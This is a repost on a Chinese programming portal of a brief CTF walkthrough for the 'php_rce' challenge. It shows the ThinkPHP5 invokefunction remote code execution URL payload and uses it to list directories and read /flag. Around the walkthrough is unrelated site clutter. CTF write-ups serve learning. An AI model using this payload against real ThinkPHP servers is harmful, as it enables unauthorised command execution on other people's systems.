攻防世界（四）php_rce

OGeek|极客世界-中国程序员成长平台 › 门户 › 编程› PHP›PHP编程经验

原作者: [db:作者] 来自: [db:来源] 收藏邀请

攻防世界系列：php_rce

1.打开题目

看到这个还是很懵的，点开任意连接都是真实的场景。

2.ThinkPHP5,这里我们需要知道它存在

远程代码执行的漏洞。

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=xxxxx（命令）

ls查看

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls

上一级 ls ../

根目录下 ls /

发现 flag打开flag cat /flag

鲜花

握手

雷人

路过

鸡蛋

该文章已有0人参与评论

请发表评论

全部评论

专题导读

More+

10-27 六六分期app的软件客服如何联系？(六六分期

11-06 可心卡盟:win10系统火狐flash插件崩溃怎么

11-06 亲亲特价:怎么删除回收站图标

11-06 济南大学虚拟社区:鲁大师节能降温的具体办

11-06 xlueops.exe:无线网络安装向导

11-06 女斗合众国:win7系统cf与主机连接不稳定怎

11-06 0xc000022-[cf烟雾头]cf怎么调烟雾头

11-06 qizideyouhuo:应用程序无法正常启动0xc0000

11-06 ipz-185:win7系统vcf文件怎么打开

11-06 傻哥蹦迪:win10系统s4怎么打开usb调试

11-06 八神浩树gtaste:回收站清空了怎么恢复

11-06 妖尾之黑色守护:win10系统电脑没有1440x900

11-06 校园至尊魔王小说:win7系统浏览网页时字体

11-06 女斗合众国:win10系统访问共享文件夹提示请

11-06 tokyo hot n0654:恢复win7系统默认字体一招

11-06 雨酷仙境:设置win7系统转移临时文件夹腾出

11-06 阿穆纳伊之杖:win7系统开始菜单在右边还原

11-06 tunespotting:win10系统火狐flash插件总是

11-06 甘尔葛分析师：计谋网站seo关键词暴涨有什

11-06 蔡贵霖: 计谋网站seo关键词暴涨有什么秘密

11-06 博益网首页:ao3网页版进入不了解决方法

11-06 漏斗子专栏: 网站数据分析小白易懂精华篇

11-06 见证双虹怎么做:win7系统开启telnet命令的

11-06 颾狐蝶蜋:系统资源不足无法完成请求的服务

11-06 国光中学校歌:提交网站到alexa查询详细步骤

11-06 西安有情天:静态网页和动态网页的区别

11-06 红木雅尚斋:外部链接构造对网站的好处

11-06 前官礼遇：防止域名劫持–增强域安全性的10

11-06 密传二转答案: 中文分词算法有哪些

11-06 金泉家园邮编:百度快照劫持的表现及应对方

centos6 升级php版本发布时间：2022-07-10

PHP判断是否包含在某个字符串中发布时间：2022-07-10

GitbookIO/gitbook:

CVE-2022-30792

2022-07-29

juleswhite/mobile-cloud-asgn1

2022-08-30

kevin-wayne/algs4: Algorithms, 4th editi

2022-08-15

kyamagu/matlab-json: Use official API: h

2022-08-17

墙壁眼睛膝盖

2022-11-06

阅读排行榜

1 kojino/Harvard-Robust-Machine-Learning:

kojino/Harvard-Robust-Machine-Learning: Repository for CS282R: Robust Machine Le

阅读：730|2022-08-18

2 matlab机械臂运动（2）

1、上接从Onshape下载机械臂到MATLAB中和双摆运动演示。这里对导入的机械臂CAD模型（c

阅读：535|2022-07-18

3 cescoffier/puppet-nexus: A Puppet Module

cescoffier/puppet-nexus: A Puppet Module for Nexus (Maven)

阅读：717|2022-08-16

4 文的笔顺,诠释文的笔画,解读文的部首

文字笔顺怎么写?文字笔顺笔画顺序是什么?诠释文字的笔画顺序怎么写了解到好多的写字朋

阅读：923|2022-11-06

5 Cassolotl/sentient.cloud · GitHub

Cassolotl/sentient.cloud · GitHub

阅读：554|2022-08-18

6 zentyal/zentyal: Linux Small Business Se

zentyal/zentyal: Linux Small Business Server

阅读：490|2022-08-15

7 updownpress/markdown-lint: Markdown Lint

updownpress/markdown-lint: Markdown Lint Tool / Checker Documentation by Mark Ha

阅读：786|2022-08-18

8 Delphi语句、过程函数

转载至：http://blog.csai.cn/user1/9162/archives/2006/2946.html#1. 语

阅读：530|2022-07-18

9 安装别墅家用电梯的实用性及安装方面的注意

? 随着社会的快速发展，人们的生活水平在不断提高的同时，更加注重享受生活。便捷、舒

阅读：446|2022-11-06

10 产假多少天2019新规定各省市产假多少天201

产假是很多产前妈妈最为关心的问题,很多妈妈都想知道自己所在城市的产假规定。下面我

阅读：1283|2022-07-30

客服电话

电子邮件

攻防世界（四）php_rce

攻防世界系列：php_rce

1.打开题目

2.ThinkPHP5,这里我们需要知道它存在

远程代码执行的漏洞。

请发表评论

全部评论

上一篇：

下一篇：

librespeed/speedtest: Self-hosted Speedt

理解 Delphi 的类(三) - 初识类的属性

avehtari/BDA_m_demos: Bayesian Data Anal

CVE-2022-31162

medfreeman/markdown-it-toc-and-anchor: m

GitbookIO/gitbook:

CVE-2022-30792

juleswhite/mobile-cloud-asgn1

kevin-wayne/algs4: Algorithms, 4th editi

kyamagu/matlab-json: Use official API: h

墙壁眼睛膝盖

关于我们

产品与服务

解决方案

139-2527-9053